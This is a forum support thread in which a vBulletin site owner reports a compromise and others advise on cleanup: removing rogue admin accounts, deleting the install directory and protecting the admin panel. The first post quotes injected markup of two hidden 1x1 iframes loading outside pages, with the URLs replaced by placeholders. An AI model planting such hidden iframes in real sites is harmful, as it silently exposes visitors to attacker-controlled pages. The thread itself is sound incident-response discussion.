Anybody else finding a jobless jack iframe in their copyright field?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • biggazillakilla
    Senior Member
    • Feb 2004
    • 322

    Anybody else finding a jobless jack iframe in their copyright field?

    This was in my copyright text of the vBulletin forum:

    vBulletin Admin Control Panel > Settings > Options > Site Name / URL / Contact Details > Copyright Text

    Code:
    <br/><br/><iframe src="http://example.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.example.com/" width="1" height="1"></iframe><br/>
    The redacted URLs are for damnxd and the aforementioned jobless jack.
  • BirdOPrey5
    Senior Member
    • Jul 2008
    • 9613
    • 5.6.3

    #2
    Have you deleted your install directory as directed by the latest announcement/eBulletin? If not you should do so immediately and then check for any Admin accounts you didn't create and delete them too.

    Comment

    • biggazillakilla
      Senior Member
      • Feb 2004
      • 322

      #3
      Originally posted by Joe D.
      Have you deleted your install directory as directed by the latest announcement/eBulletin? If not you should do so immediately and then check for any Admin accounts you didn't create and delete them too.
      Sure did, right after receiving the security bulletin by email (on 2013-09-03).

      And I just checked--yes, I had one user promoted to admin. It registered on 2013-09-01 and was active today.

      Hopefully that'll keep them out.

      Edit: Another other activities to look out for or changes they might make, at least that you're aware of?

      Comment

      • BirdOPrey5
        Senior Member
        • Jul 2008
        • 9613
        • 5.6.3

        #4
        No, but I would htaccess password protect your Admin CP directory for extra safety.

        Comment

        • Wayne Luke
          vBulletin Technical Support Lead
          • Aug 2000
          • 73981

          #5
          Moved to the proper location... Licensed Customer Feedback is not a Support Forum.
          Translations provided by Google.

          Wayne Luke
          The Rabid Badger - a vBulletin Cloud demonstration site.
          vBulletin 5 API

          Comment

          • biggazillakilla
            Senior Member
            • Feb 2004
            • 322

            #6
            Originally posted by Joe D.
            No, but I would htaccess password protect your Admin CP directory for extra safety.
            Done. Took a while, since I have some conflicts in my htaccess file, but I got it sorted out.

            Thanks, Wayne. I didn't see the Support Forum when I looked. Now I know.

            Comment

            • parm775
              Member
              • Jan 2006
              • 48
              • 3.7.x

              #7
              Deleting the install directory does not stop creating of admin ids. One of my forums that I had deleted the install directory completely had two ids created both "admin" with administrator rights. I havent deleted them but have removed the e-mail address from them , changed passwords and banned them both.

              This happened yesterday. I am running 4.2.1

              Comment

              • Zachery
                Former vBulletin Support
                • Jul 2002
                • 59097

                #8
                Please read the following two blog posts:
                This guide is for what to do, after you’ve been hacked, exploited, and or defaced. Step 1, Change everything: If you believe, or think your site has


                Getting Started This guide is intended to be a starting point for helping to keep your site safe and secure in the long run. It is not a be-all, end-all guide


                Also please see these recent security announcements:

                vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
                vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions

                Comment

                Related Topics

                Collapse

                Working...